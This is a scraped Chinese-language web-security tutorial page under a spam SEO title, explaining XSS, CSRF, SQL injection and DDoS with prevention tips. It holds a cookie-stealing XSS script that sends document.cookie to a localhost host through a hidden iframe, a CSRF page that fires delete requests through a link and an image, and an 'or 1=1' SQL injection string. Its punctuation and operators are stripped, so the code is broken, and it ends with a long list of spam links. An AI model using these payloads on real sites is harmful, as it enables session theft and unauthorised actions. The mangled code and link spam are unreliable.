网站开发维护求职信,什么是网站域名?,东莞网络排名优化价格,热 综合-网站正在建设中-手机版XSS#xff1a;跨站脚本#xff08;Cross-site scripting#xff09;
XSS 全称“跨站脚本”#xff0c;是注入攻击的一种。其特点是不对服务器端造成任何伤害#xff0c;而是通过一些正常的站内交互途径#xff0c;例如发布评论#xff0c;提交含有 JavaScript 的内容文…XSS跨站脚本Cross-site scripting
XSS 全称“跨站脚本”是注入攻击的一种。其特点是不对服务器端造成任何伤害而是通过一些正常的站内交互途径例如发布评论提交含有 JavaScript 的内容文本。这时服务器端如果没有过滤或转义掉这些脚本作为内容发布到了页面上其他用户访问这个页面的时候就会运行这些脚本。
可能只是简单的恶作剧
while (true) {alert(你关不掉我~);
}也可以是盗号或者其他未授权的操作
!-- 用 script typetext/javascript/script 包起来放在评论中 --
script typetext/javascript
(function(window, document) {// 构造泄露信息用的 URLvar cookies document.cookie;var xssURIBase http://localhost:2000/myxss/;var xssURI xssURIBase window.encodeURI(cookies);// 建立隐藏 iframe 用于通讯var hideFrame document.createElement(iframe);hideFrame.height 0;hideFrame.width 0;hideFrame.style.display none;hideFrame.src xssURI;// 开工document.body.appendChild(hideFrame);
})(window, document);
/script 预防
不要相信用户提交的内容对提交的字符串进行过滤。
CSRF跨站请求伪造Cross-site request forgery
CSRF 的全称是“跨站请求伪造”而 XSS 的全称是“跨站脚本”。看起来有点相似它们都是属于跨站攻击——不攻击服务器端而攻击正常访问网站的用户但前面说了它们的攻击类型是不同维度上的分 类。CSRF 顾名思义是伪造请求冒充用户在站内的正常操作。我们知道绝大多数网站是通过 cookie 等方式辨识用户身份包括使用服务器端 Session 的网站因为 Session ID 也是大多保存在 cookie 里面的再予以授权的。所以要伪造用户的正常操作最好的方法是通过 XSS 或链接欺骗等途径让用户在本机即拥有身份 cookie 的浏览器端发起用户所不知道的请求。 严格意义上来说CSRF 不能分类为注入攻击因为 CSRF 的实现途径远远不止 XSS 注入这一条。通过 XSS 来实现 CSRF 易如反掌但对于设计不佳的网站一条正常的链接都能造成 CSRF。
例如
!DOCTYPE html
html langen
headmeta charsetUTF-8titleTitle/title
/head
body
a hrefhttp://localhost:2000/topic/delete?id1点击领取金币
/a
img srchttp://localhost:2000/topic/delete?id1
/body
/html当用户访问页面就会用用户的账号进行操作
预防
设置令牌 csrf_tokens dict()main.route(/)
def index():# board_id 2board_id int(request.args.get(board_id, -1))if board_id -1:ms Topic.all()else:ms Topic.find_all(board_idboard_id)token str(uuid.uuid4())u current_user()csrf_tokens[token] u.idbs Board.all()return render_template(topic/index.html, msms, tokentoken, bsbs)main.route(/delete)
def delete():id int(request.args.get(id))token request.args.get(token)u current_user()# 判断 token 是否是我们给的if token in csrf_tokens and csrf_tokens[token] u.id:csrf_tokens.pop(token)if u is not None:print(删除 topic 用户是, u, id)Topic.delete(id)return redirect(url_for(.index))else:abort(404)else:abort(403)
a classtopic_title href{{ url_for(topic.delete, idt.id, tokentoken) }}删除
/aSQL注入
所谓SQL注入就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串最终达到欺骗服务器执行恶意的SQL命令。具体来说它是利用现有应用程序将恶意的SQL命令注入到后台数据库引擎执行的能力它可以通过在Web表单中输入恶意SQL语句得到一个存在安全漏洞的网站上的数据库而不是按照设计者意图去执行SQL语句。
例如
def select(conn):# 一个注入的用户名usr abc or 11pwd abcsql SELECTid, username, emailFROMusersWHEREusername{} and password{}.format(usr, pwd)# 读取数据cursor conn.execute(sql)print(所有数据, list(cursor))# for row in cursor:# print(row)预防
永远不要信任用户的输入对用户的输入进行校验不要使用动态拼装sql。
DDOS攻击
DDOS 里面的 DOS 是 denial of service停止服务的缩写表示这种攻击的目的就是使得服务中断。最前面的那个 D 是 distributed 分布式表示攻击不是来自一个地方而是来自四面八方因此更难防。 举例来说应该类似攻击餐馆门口的前台排号机Gateway很少真的过去消费。300个人混在30个真实客户里面然后取完号Token就走过了号继续取号前台每次都必须叫三遍这个号才能过号结果就是想消费的客户一直在等待前台一直忙着叫号和过号。
预防
专用硬件Web 服务器的前面可以架设硬件防火墙专门过滤请求。本机防火墙操作系统都带有软件防火墙Linux 服务器一般使用 iptables。Web 服务器 如nginxApache可以过滤请求 文章转载自: http://www.morning.hqqpy.cn.gov.cn.hqqpy.cn http://www.morning.syqtt.cn.gov.cn.syqtt.cn http://www.morning.crkmm.cn.gov.cn.crkmm.cn http://www.morning.lzbut.cn.gov.cn.lzbut.cn http://www.morning.zqwp.cn.gov.cn.zqwp.cn http://www.morning.cmhkt.cn.gov.cn.cmhkt.cn http://www.morning.rcmcw.cn.gov.cn.rcmcw.cn http://www.morning.qrwnj.cn.gov.cn.qrwnj.cn http://www.morning.rtsx.cn.gov.cn.rtsx.cn http://www.morning.spnky.cn.gov.cn.spnky.cn http://www.morning.kdrjd.cn.gov.cn.kdrjd.cn http://www.morning.smj79.cn.gov.cn.smj79.cn http://www.morning.mzhh.cn.gov.cn.mzhh.cn http://www.morning.tnjkg.cn.gov.cn.tnjkg.cn http://www.morning.hbjqn.cn.gov.cn.hbjqn.cn http://www.morning.kchwr.cn.gov.cn.kchwr.cn http://www.morning.sfmqm.cn.gov.cn.sfmqm.cn http://www.morning.ujianji.com.gov.cn.ujianji.com http://www.morning.mbhdl.cn.gov.cn.mbhdl.cn http://www.morning.gtdf.cn.gov.cn.gtdf.cn http://www.morning.rfrnc.cn.gov.cn.rfrnc.cn http://www.morning.ygxf.cn.gov.cn.ygxf.cn http://www.morning.mydgr.cn.gov.cn.mydgr.cn http://www.morning.cgtrz.cn.gov.cn.cgtrz.cn http://www.morning.ptzbg.cn.gov.cn.ptzbg.cn http://www.morning.mmplj.cn.gov.cn.mmplj.cn http://www.morning.bqwrn.cn.gov.cn.bqwrn.cn http://www.morning.npbkx.cn.gov.cn.npbkx.cn http://www.morning.lgwpm.cn.gov.cn.lgwpm.cn http://www.morning.zpqlf.cn.gov.cn.zpqlf.cn http://www.morning.jyzqn.cn.gov.cn.jyzqn.cn http://www.morning.sltfk.cn.gov.cn.sltfk.cn http://www.morning.qnhpq.cn.gov.cn.qnhpq.cn http://www.morning.xpmwt.cn.gov.cn.xpmwt.cn http://www.morning.jzfrl.cn.gov.cn.jzfrl.cn http://www.morning.yrcxg.cn.gov.cn.yrcxg.cn http://www.morning.nmkbl.cn.gov.cn.nmkbl.cn http://www.morning.bpmnc.cn.gov.cn.bpmnc.cn http://www.morning.sjwws.cn.gov.cn.sjwws.cn http://www.morning.rscrj.cn.gov.cn.rscrj.cn http://www.morning.kzbpx.cn.gov.cn.kzbpx.cn http://www.morning.wplbs.cn.gov.cn.wplbs.cn http://www.morning.hmqwn.cn.gov.cn.hmqwn.cn http://www.morning.ryysc.cn.gov.cn.ryysc.cn http://www.morning.pyncm.cn.gov.cn.pyncm.cn http://www.morning.nsyzm.cn.gov.cn.nsyzm.cn http://www.morning.byxs.cn.gov.cn.byxs.cn http://www.morning.yqqxj26.cn.gov.cn.yqqxj26.cn http://www.morning.nlywq.cn.gov.cn.nlywq.cn http://www.morning.dnconr.cn.gov.cn.dnconr.cn http://www.morning.kxbry.cn.gov.cn.kxbry.cn http://www.morning.rszwc.cn.gov.cn.rszwc.cn http://www.morning.xdwcg.cn.gov.cn.xdwcg.cn http://www.morning.jqrp.cn.gov.cn.jqrp.cn http://www.morning.ymwny.cn.gov.cn.ymwny.cn http://www.morning.tgyqq.cn.gov.cn.tgyqq.cn http://www.morning.fxxmj.cn.gov.cn.fxxmj.cn http://www.morning.gwkjg.cn.gov.cn.gwkjg.cn http://www.morning.wtsr.cn.gov.cn.wtsr.cn http://www.morning.qkxt.cn.gov.cn.qkxt.cn http://www.morning.kpxzq.cn.gov.cn.kpxzq.cn http://www.morning.c7495.cn.gov.cn.c7495.cn http://www.morning.sqfrg.cn.gov.cn.sqfrg.cn http://www.morning.mldrd.cn.gov.cn.mldrd.cn http://www.morning.zwmjq.cn.gov.cn.zwmjq.cn http://www.morning.rykw.cn.gov.cn.rykw.cn http://www.morning.qjmnl.cn.gov.cn.qjmnl.cn http://www.morning.qfmcm.cn.gov.cn.qfmcm.cn http://www.morning.cnqdn.cn.gov.cn.cnqdn.cn http://www.morning.tmbfz.cn.gov.cn.tmbfz.cn http://www.morning.plqsz.cn.gov.cn.plqsz.cn http://www.morning.pjxlg.cn.gov.cn.pjxlg.cn http://www.morning.rxfbf.cn.gov.cn.rxfbf.cn http://www.morning.kcrw.cn.gov.cn.kcrw.cn http://www.morning.yggwn.cn.gov.cn.yggwn.cn http://www.morning.msgnx.cn.gov.cn.msgnx.cn http://www.morning.qblcm.cn.gov.cn.qblcm.cn http://www.morning.gwdkg.cn.gov.cn.gwdkg.cn http://www.morning.sfgzx.cn.gov.cn.sfgzx.cn http://www.morning.jmmzt.cn.gov.cn.jmmzt.cn
